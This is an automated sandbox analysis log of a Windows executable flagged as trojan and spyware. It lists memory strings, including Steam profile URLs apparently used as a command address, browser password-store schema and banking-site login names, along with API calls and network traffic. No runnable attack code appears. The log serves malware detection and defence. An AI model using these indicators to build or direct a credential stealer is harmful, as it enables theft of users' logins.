        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
        Source: 76561199609719039[1].htm.0.drString found in binary or memory: https://steamcommunity.com/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/-
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://steamcommunity.com/discussions/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
        Source: 76561199609719039[1].htm.0.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199609719039
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://steamcommunity.com/market/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
        Source: Gj8P0mbklo.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199609719039
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199609719039(
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199609719039/badges
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199609719039/inventory/
        Source: Gj8P0mbklo.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199609719039/ujs/strwvfncostrbrCHbrGk
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199609719039B
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://steamcommunity.com/workshop/
        Source: 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
        Source: 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/about/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/explore/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/legal/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/mobile
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/news/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/points/shop/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/stats/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
        Source: Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: unknownHTTPS traffic detected: 23.61.62.148:443 -> 192.168.2.6:49699 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.13.203:443 -> 192.168.2.6:49700 version: TLS 1.2
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00373C10 NtCreateFile,GetProcessHeap,RtlAllocateHeap,NtReadFile,0_2_00373C10
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0036BCD0 NtQuerySystemInformation,0_2_0036BCD0
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0036BE50 NtQuerySystemInformation,0_2_0036BE50
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003648B30_2_003648B3
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003709400_2_00370940
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003701C00_2_003701C0
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003553400_2_00355340
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0036B4B00_2_0036B4B0
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0036C4900_2_0036C490
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003565600_2_00356560
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003596300_2_00359630
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0035CE400_2_0035CE40
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00356F100_2_00356F10
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0035D7D00_2_0035D7D0
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003680300_2_00368030
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003678200_2_00367820
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0036A0700_2_0036A070
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0035D8C10_2_0035D8C1
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003558C00_2_003558C0
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0038F1090_2_0038F109
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003619F00_2_003619F0
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0038E9E70_2_0038E9E7
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003772200_2_00377220
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00357A4E0_2_00357A4E
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00357A490_2_00357A49
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003672900_2_00367290
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00351A800_2_00351A80
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003513100_2_00351310
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00370B190_2_00370B19
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0036A3700_2_0036A370
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00368B800_2_00368B80
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00363BE30_2_00363BE3
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003683D00_2_003683D0
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00353BC00_2_00353BC0
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00367C300_2_00367C30
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0039142E0_2_0039142E
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003524A00_2_003524A0
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003634E00_2_003634E0
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00363D200_2_00363D20
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003805640_2_00380564
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00354DB00_2_00354DB0
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003515800_2_00351580
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00363E2C0_2_00363E2C
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00373E500_2_00373E50
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00352EB00_2_00352EB0
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003666E00_2_003666E0
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0036A7200_2_0036A720
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0038C7200_2_0038C720
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003687700_2_00368770
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003547800_2_00354780
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0037BF8E0_2_0037BF8E
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0037DFC00_2_0037DFC0
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: String function: 00375550 appears 42 times
        Source: Gj8P0mbklo.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP
        Source: classification engineClassification label: mal84.troj.spyw.winEXE@1/2@2/2
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003741E0 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,Sleep,0_2_003741E0
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199609719039[1].htmJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCommand line argument: .I90_2_00394880
        Source: Gj8P0mbklo.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Gj8P0mbklo.exe, 00000000.00000003.2127679527.0000000005125000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2108951092.00000000050BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: Gj8P0mbklo.exeReversingLabs: Detection: 57%
        Source: Gj8P0mbklo.exeVirustotal: Detection: 61%
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: Gj8P0mbklo.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Gj8P0mbklo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00365C3B push 8B003961h; iretd 0_2_00365C40
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00394785 push ecx; ret 0_2_00394798
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003701C0 FindFirstFileA,PathMatchSpecA,0_2_003701C0
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0035CE40 FindFirstFileA,FindNextFileA,Sleep,0_2_0035CE40
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00389AFB FindFirstFileExW,0_2_00389AFB
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.000000000274E000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
        Source: Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00375363 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00375363
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00374780 mov eax, dword ptr fs:[00000030h]0_2_00374780
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00370940 SHGetFolderPathA,SHGetFolderPathA,GetProcessHeap,HeapFree,Sleep,0_2_00370940
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00374A1F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00374A1F
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00375363 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00375363
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003754D5 SetUnhandledExceptionFilter,0_2_003754D5
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00380DCC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00380DCC
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0037517F cpuid 0_2_0037517F
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: EnumSystemLocalesW,0_2_0038D00D
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0038D0A0
